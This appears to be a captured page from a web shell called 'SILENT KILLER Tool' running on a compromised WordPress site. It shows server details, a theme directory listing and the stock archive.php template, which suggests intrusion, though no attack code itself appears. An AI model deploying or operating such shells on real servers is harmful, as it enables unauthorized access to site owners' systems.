Current Path: > home > ivftiowh > greeceivf.com > wp-content > themes > twentysixteen >
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
css | Directory | - | - | |
genericons | Directory | - | - | |
inc | Directory | - | - | |
js | Directory | - | - | |
template-parts | Directory | - | - | |
.htaccess | File | 160 bytes | May 28 2024 06:37:50. | |
404.php | File | 906 bytes | April 08 2024 06:30:17. | |
archive.php | File | 1960 bytes | May 30 2017 21:21:43. | |
comments.php | File | 1974 bytes | October 04 2017 13:22:48. | |
footer.php | File | 2065 bytes | May 17 2018 18:21:26. | |
functions.php | File | 14723 bytes | October 04 2017 23:53:47. | |
header.php | File | 4184 bytes | September 04 2024 06:56:11. | |
html5.css | File | 6400 bytes | July 17 2024 04:38:35. | |
image.php | File | 3554 bytes | May 30 2017 21:21:43. | |
index.php | File | 1805 bytes | June 25 2017 22:06:41. | |
page.php | File | 980 bytes | May 30 2017 21:21:43. | |
readme.txt | File | 3427 bytes | May 17 2018 18:27:27. | |
rtl.css | File | 13036 bytes | May 17 2018 18:21:26. | |
screenshot.png | File | 463555 bytes | May 30 2017 21:53:40. | |
search.php | File | 1481 bytes | May 30 2017 21:21:43. | |
searchform.php | File | 744 bytes | May 30 2017 21:21:43. | |
sidebar-content-bottom.php | File | 794 bytes | May 30 2017 21:21:43. | |
sidebar.php | File | 390 bytes | May 30 2017 21:21:43. | |
single.php | File | 1714 bytes | May 30 2017 21:21:43. | |
slider.css | File | 57 bytes | June 27 2024 01:15:00. | |
style.css | File | 70311 bytes | May 17 2018 18:27:27. |
<?php /** * The template for displaying archive pages * * Used to display archive-type pages if nothing more specific matches a query. * For example, puts together date-based pages if no date.php file exists. * * If you'd like to further customize these archive views, you may create a * new template file for each one. For example, tag.php (Tag archives), * category.php (Category archives), author.php (Author archives), etc. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package WordPress * @subpackage Twenty_Sixteen * @since Twenty Sixteen 1.0 */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <?php the_archive_title( '<h1 class="page-title">', '</h1>' ); the_archive_description( '<div class="taxonomy-description">', '</div>' ); ?> </header><!-- .page-header --> <?php // Start the Loop. while ( have_posts() ) : the_post(); /* * Include the Post-Format-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Format name) and that will be used instead. */ get_template_part( 'template-parts/content', get_post_format() ); // End the loop. endwhile; // Previous/next page navigation. the_posts_pagination( array( 'prev_text' => __( 'Previous page', 'twentysixteen' ), 'next_text' => __( 'Next page', 'twentysixteen' ), 'before_page_number' => '<span class="meta-nav screen-reader-text">' . __( 'Page', 'twentysixteen' ) . ' </span>', ) ); // If no content, include the "No posts found" template. else : get_template_part( 'template-parts/content', 'none' ); endif; ?> </main><!-- .site-main --> </div><!-- .content-area --> <?php get_sidebar(); ?> <?php get_footer(); ?>
SILENT KILLER Tool